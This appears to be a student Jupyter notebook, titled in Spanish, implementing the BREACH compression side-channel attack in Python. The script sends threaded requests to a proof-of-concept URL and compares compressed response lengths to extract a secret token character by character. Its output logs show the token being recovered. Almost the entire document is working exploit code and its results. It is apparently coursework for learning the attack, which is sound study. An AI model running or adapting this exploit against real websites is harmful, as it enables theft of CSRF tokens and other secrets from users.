## PRÁCTICA IMPLEMENTACIÓN BREACH EN PYTHON
### Autores:

Alejandro Manuel López Gómez

In [18]:
import random
import requests
import threading
import time

# Spacing multiplier
multiplier = 1
# Extracted secret to be completed
secret = ''
# Spacing multiplier scope
scope = 100
# Spacing characters to avoid Huffman encoding
spacing = "[][][][][][][][]"
# URL address with vulnerable parameter
url = "http://malbot.net/poc/?request_token='"
# Known ASCII values of secret
ascii_list = [39, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101]
# Verdict of each thread
verdicts = [False] * len(ascii_list)


# Sends a request to the vulnerable page
# Input
#   - url: vulnerable url with parameter included
#   - secret: already discovered part of secret is added
#   - character: test character in the request
#   - padding: added padding to avoid Huffman errors
#   - position: padding may be added in front or behind testing character
# Output
#   - length of raw response

def get_length(url,secret,character,padding,position):
  if position:
    response = requests.get(url + secret + character + (padding if padding != None else ''), stream=True)
  else:
    response = requests.get(url + secret + (padding if padding != None else '') + character, stream=True)
  return len(response.raw.read())

# Populates the verdicts list comparing with original length (check for compression)
# Input
#   - original_length: original raw response length (without testing characters)
#   - indicator: position within verdict array to include response
#   - padding
#   - position

def test_char(original_length,indicator,padding,position):
  # First try
  if original_length == get_length(url, secret, chr(ascii_list[indicator]), padding, position):
    verdicts[indicator] = True
  else:
    # Second try with inverted position
    if original_length == get_length(url, secret, chr(ascii_list[indicator]), padding, True ^ position):
      verdicts[indicator] = True
    else:
      verdicts[indicator] = False
    verdicts[indicator] = False

# Thread management
# This function starts a thread for each ASCII possibility and then waits for
# all of them to finish

def execute_threads(original_length,padding,position):
  threads = list(map(lambda indicator: threading.Thread(target=test_char, args=(original_length,indicator,padding,position)), range(len(ascii_list))))
  list(map(lambda thread: thread.start(), threads))
  list(map(lambda thread: thread.join(), threads))

# Append to secret (global variable) the discovered character
# Input
#   - indicator: get the tested character from the ASCII list

def append_secret(indicator):
  global secret
  secret += chr(ascii_list[indicator])


if __name__ == "__main__":
  # Start the clock
  t0 = time.time()
  # Get original length
  original_length = get_length(url, secret, '', spacing, True)
  while True:
    # Execute one thread for each possible char
    execute_threads(original_length, spacing*multiplier, True)
    # Look for ending character
    if chr(39) in secret:
      break
    else:
      # If collisions are found, try again with dynamic padding
      if verdicts.count(True) != 1:
        # Get random multiplier
        multiplier = random.randint(1, scope)
        print(f"[WARN] CHANGED MULTIPLIER TO {multiplier}")
        # Compute new original length
        original_length = get_length(url, secret, '', spacing*multiplier, True)
      # Only one guess is made, take it
      elif verdicts.count(True) == 1:
        append_secret(verdicts.index(True))
        print(f"[INFO] EXTRACTED SECRET: {secret}")
  print(f"[END] Expected ending character detected. Program finished.")
  print(f"[END] Elapsed time is {time.time() - t0} seconds.")

[INFO] EXTRACTED SECRET: b
[INFO] EXTRACTED SECRET: bb
[INFO] EXTRACTED SECRET: bb6
[INFO] EXTRACTED SECRET: bb63
[INFO] EXTRACTED SECRET: bb63e
[INFO] EXTRACTED SECRET: bb63e4
[INFO] EXTRACTED SECRET: bb63e4b
[INFO] EXTRACTED SECRET: bb63e4ba
[INFO] EXTRACTED SECRET: bb63e4ba6
[INFO] EXTRACTED SECRET: bb63e4ba67
[INFO] EXTRACTED SECRET: bb63e4ba67e
[INFO] EXTRACTED SECRET: bb63e4ba67e2
[INFO] EXTRACTED SECRET: bb63e4ba67e24
[INFO] EXTRACTED SECRET: bb63e4ba67e24d
[INFO] EXTRACTED SECRET: bb63e4ba67e24da
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab8
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81e
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed4
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed42
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed425
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed425c
[INFO] EXTRACTED SECRET: bb63e4ba67e24dab81ed425c5
[INFO] EXTRACTED SECRET: 